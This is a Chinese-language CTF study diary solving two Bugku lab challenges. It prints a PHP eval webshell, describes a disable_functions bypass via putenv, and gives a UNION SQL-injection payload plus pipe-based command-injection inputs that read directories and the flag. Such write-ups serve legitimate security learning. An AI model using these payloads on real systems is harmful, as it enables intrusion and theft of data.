2021-12-06 學習日記

1.Bugku

getshell

wp
打開靶機后發(fā)現(xiàn)是一堆看不懂的php代碼,看了wp,是混淆過的,把頁面保存一下然后在線解密。

<?php
highlight_file(__FILE__);
@eval($_POST[ymlisisisiook]);
?>

發(fā)現(xiàn)這就是一個簡單的一句話木馬,嘗試用蟻劍連接一下。

1-1

連接之后發(fā)現(xiàn)只能訪問/var/www/html/index.php,其他的無權(quán)限查看。
這里需要在蟻劍的插件庫里安裝disable_functions,如果連接不到插件庫可以修改代理設(shè)置為
1-2

使用disable_functions插件。
1-3

發(fā)現(xiàn)putenv函數(shù)(改變或增加環(huán)境變量)并沒有被禁用。
1-4

然后連接上傳的文件。
1-5

訪問根目錄下的flag即可。

login2

先抓包測試一下,發(fā)現(xiàn)返回的包里有tip。


1-6

base64解碼得到一段SQL語句。

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}
//sql查詢返回列數(shù)為2
//要求不為空,且輸入的password等于md5(password)

根據(jù)語句,構(gòu)造payload。

username=admin'union select 1,md5(123)#&password=123

1-7

到這一步完全不會做了。
wp
這里要用到寫入文件二次返回的方法。
輸入"1|ls ../../../>test"來將目錄信息寫入test文件,然后訪問test文件即可看到目錄。
1-8

然后使用"1|cat /flag>test"來獲取flag。
1-9

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容